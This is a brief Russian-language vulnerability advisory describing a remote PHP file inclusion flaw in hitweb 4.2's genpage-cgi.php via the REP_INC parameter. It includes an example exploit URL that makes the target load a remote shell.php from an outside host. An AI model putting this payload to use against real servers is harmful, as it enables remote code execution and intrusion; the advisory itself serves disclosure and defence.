Программа: hitweb 4.2, возможно другие версии.

Уязвимость позволяет удаленному
пользователю выполнить произвольный PHP
сценарий на целевой системе. Уязвимость
существует из-за недостаточной обработки
входных данных в параметре REP_INC" в
сценарии genpage-cgi.php. Удаленный пользователь
может выполнить произвольный PHP сценарий на
целевой системе с привилегиями Web сервера.
Для удачной эксплуатации уязвимости опция
"register_globals" должна быть включена в
конфигурационном файле PHP.

Пример:

http://victim/dir_hitweb/genpage-cgi.php?REP_INC=http://www.evalsite.com/shell.php?

  • Подпишись на наc в Telegram!

    Только важные новости и лучшие статьи

    Подписаться

  • Подписаться
    Уведомить о
    0 комментариев
    Межтекстовые Отзывы
    Посмотреть все комментарии